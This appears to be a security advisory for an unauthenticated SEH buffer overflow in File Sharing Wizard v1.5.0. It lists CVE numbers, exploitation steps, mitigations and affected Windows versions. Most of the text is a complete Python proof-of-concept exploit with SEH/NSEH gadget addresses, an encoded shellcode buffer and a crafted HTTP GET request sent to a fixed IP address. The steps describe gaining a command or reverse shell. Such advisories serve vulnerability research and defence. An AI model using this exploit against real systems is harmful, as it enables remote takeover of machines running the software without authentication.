CVE-2019-17415
CVE-2019-16724
CVE-2010-2331
In successful exploitation scenarios, attackers may gain shell access to the target system and execute arbitrary OS-level commands—without authentication.
Exploitation Steps
An attacker can exploit the vulnerability through the following steps:
Identify a target running File Sharing Wizard v1.5.0 and accessible via HTTP.
Craft a malicious URL containing a buffer overflow payload that corrupts the SEH handler.
Send the HTTP GET request to the target using tools like Python scripts or exploit frameworks.
Trigger the buffer overflow, leading to SEH chain hijacking and redirection of execution to attacker-controlled shellcode.
Gain remote access via a command shell or reverse shell, with the same privileges as the running application.
################### PoC ################### #!/usr/bin/python import socket import os import sys # Bad chars: \x00\x20 # # SEH value: 0x9090eb08 (JMP short) # # NSEH value: 0x7c37576d : pop esi # pop edi # ret | asciiprint,ascii {PAGE_EXECUTE_READ} [MSVCR71.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.6030.0 (C:\Program Files\File Sharing Wizard\bin\MSVCR71.dll) seh='\x6d\x57\x37\x7c' nseh='\x90\x90\xeb\x08' buf = b"" buf += b"\xbe\x8f\x59\xb8\x41\xdb\xd5\xd9\x74\x24\xf4\x5a\x31" buf += b"\xc9\xb1\x31\x31\x72\x13\x83\xea\xfc\x03\x72\x80\xbb" buf += b"\x4d\xbd\x76\xb9\xae\x3e\x86\xde\x27\xdb\xb7\xde\x5c" buf += b"\xaf\xe7\xee\x17\xfd\x0b\x84\x7a\x16\x98\xe8\x52\x19" buf += b"\x29\x46\x85\x14\xaa\xfb\xf5\x37\x28\x06\x2a\x98\x11" buf += b"\xc9\x3f\xd9\x56\x34\xcd\x8b\x0f\x32\x60\x3c\x24\x0e" buf += b"\xb9\xb7\x76\x9e\xb9\x24\xce\xa1\xe8\xfa\x45\xf8\x2a" buf += b"\xfc\x8a\x70\x63\xe6\xcf\xbd\x3d\x9d\x3b\x49\xbc\x77" buf += b"\x72\xb2\x13\xb6\xbb\x41\x6d\xfe\x7b\xba\x18\xf6\x78" buf += b"\x47\x1b\xcd\x03\x93\xae\xd6\xa3\x50\x08\x33\x52\xb4" buf += b"\xcf\xb0\x58\x71\x9b\x9f\x7c\x84\x48\x94\x78\x0d\x6f" buf += b"\x7b\x09\x55\x54\x5f\x52\x0d\xf5\xc6\x3e\xe0\x0a\x18" buf += b"\xe1\x5d\xaf\x52\x0f\x89\xc2\x38\x45\x4c\x50\x47\x2b" buf += b"\x4e\x6a\x48\x1b\x27\x5b\xc3\xf4\x30\x64\x06\xb1\xcf" buf += b"\x2e\x0b\x93\x47\xf7\xd9\xa6\x05\x08\x34\xe4\x33\x8b" buf += b"\xbd\x94\xc7\x93\xb7\x91\x8c\x13\x2b\xeb\x9d\xf1\x4b" buf += b"\x58\x9d\xd3\x2f\x3f\x0d\xbf\x81\xda\xb5\x5a\xde" poc= 'A' * 1035 + nseh + seh + '\x90' * 10 + buf + '\x90' * (3949-len(buf)) payload='GET //.:/' + poc + ' HTTP/1.0\r\n\r\n' s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("172.16.216.135", 80)) s.send(payload) s.close
Recommended Mitigations:
Immediately restrict or disable access to File Sharing Wizard instances exposed to untrusted networks.
Apply vendor patches or consider replacing the software if no fix is available.
Implement network-based intrusion prevention systems (IPS) to detect and block exploit patterns.
Monitor logs and network traffic for anomalous GET requests targeting the service.
Conclusion
This vulnerability in File Sharing Wizard v1.5.0 represents a severe security risk due to its unauthenticated nature and potential for full system compromise.
Reporting Information:
Affected Versions: File Sharing Wizard v1.5.0
- Microsoft Windows Vista Ultimate 6.0.6002 Service Pack 2 Build 6002
- Microsoft Windows 7 Professional 6.1.7601 Service Pack 1 Build 7601